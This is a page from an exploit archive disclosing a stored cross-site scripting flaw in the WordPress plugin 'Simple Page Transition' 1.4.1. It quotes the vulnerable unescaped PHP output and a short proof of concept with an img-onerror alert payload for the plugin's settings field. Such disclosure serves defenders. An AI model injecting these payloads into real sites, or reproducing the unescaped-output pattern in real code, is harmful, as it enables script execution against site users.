Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- WordPress Simple Page Transition 1.4.1 Cross Site Scripting[6]
- Authored by Mariam Tariq[7]
-
WordPress Simple Page Transition plugin version 1.4.1 suffers from a persistent cross site scripting vulnerability.
- SHA-256 |
6add737b61d202a5e1a60dba7f03322ef6b69ca1cb41cb65fe52abe7e5145de6
- Download[8] | Favorite[9] | View[10]
Change Mirror[11] Download[12]
# Exploit Title: WordPress Plugin ‘Simple Page Transition’ - Stored Cross
Site Scripting
# Date: 27-06-2022
# Exploit Author: Mariam Tariq - HunterSherlock
# Vendor Homepage: https://wordpress.org/plugins/simple-page-transition/
# Version: 1.4.1
# Tested on: Firefox
# Contact me:Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser.
*#Vulnerable code*:
```
<label for="simple_page_transition_ignored"><?php _e( 'Ignored Download
Links', 'spt' ); ?></label><br />
<input type="text" id="simple_page_transition_ignored"
name="simple_page_transition_ignored" value="*<?php print
$simple_page_transition_ignored; ?>*" /><br />
```
*#POC:*
1- Install the plugin ‘simple page transition’ & activate it.
2- Navigate towards the “ignored download links”
3- Enter the XSS payload ` *“><img src=x onerror=alert(1)>*`
*#POC image:*
https://imgur.com/yzaTkhi
File Tags
- ActiveX[17] (932)
- Advisory[18] (77,665)
- Arbitrary[19] (15,136)
- BBS[20] (2,859)
- Bypass[21] (1,571)
- CGI[22] (1,011)
- Code Execution[23] (6,682)
- Conference[24] (668)
- Cracker[25] (797)
- CSRF[26] (3,272)
- DoS[27] (21,858)
- Encryption[28] (2,331)
- Exploit[29] (49,866)
- File Inclusion[30] (4,148)
- File Upload[31] (943)
- Firewall[32] (821)
- Info Disclosure[33] (2,549)
- Intrusion Detection[34] (853)
- Java[35] (2,790)
- JavaScript[36] (798)
- Kernel[37] (6,043)
- Local[38] (14,015)
- Magazine[39] (586)
- Overflow[40] (12,183)
- Perl[41] (1,410)
- PHP[42] (5,041)
- Proof of Concept[43] (2,283)
- Protocol[44] (3,312)
- Python[45] (1,396)
- Remote[46] (29,705)
- Root[47] (3,451)
- Ruby[48] (576)
- Scanner[49] (1,630)
- Security Tool[50] (7,688)
- Shell[51] (3,061)
- Shellcode[52] (1,202)
- Sniffer[53] (881)
- Spoof[54] (2,084)
- SQL Injection[55] (16,008)
- TCP[56] (2,359)
- Trojan[57] (676)
- UDP[58] (866)
- Virus[59] (659)
- Vulnerability[60] (30,449)
- Web[61] (9,029)
- Whitepaper[62] (3,715)
- x86[63] (942)
- XSS[64] (17,335)
- Other[65]
File Archives
- June 2022[66]
- May 2022[67]
- April 2022[68]
- March 2022[69]
- February 2022[70]
- January 2022[71]
- December 2021[72]
- November 2021[73]
- October 2021[74]
- September 2021[75]
- August 2021[76]
- July 2021[77]
- Older[78]
Systems
- AIX[79] (426)
- Apple[80] (1,883)
- BSD[81] (368)
- CentOS[82] (55)
- Cisco[83] (1,913)
- Debian[84] (5,948)
- Fedora[85] (1,690)
- FreeBSD[86] (1,241)
- Gentoo[87] (4,152)
- HPUX[88] (878)
- iOS[89] (318)
- iPhone[90] (108)
- IRIX[91] (220)
- Juniper[92] (67)
- Linux[93] (42,334)
- Mac OS X[94] (683)
- Mandriva[95] (3,105)
- NetBSD[96] (255)
- OpenBSD[97] (478)
- RedHat[98] (11,656)
- Slackware[99] (941)
- Solaris[100] (1,607)
- SUSE[101] (1,444)
- Ubuntu[102] (7,855)
- UNIX[103] (9,073)
- UnixWare[104] (185)
- Windows[105] (6,420)
- Other[106]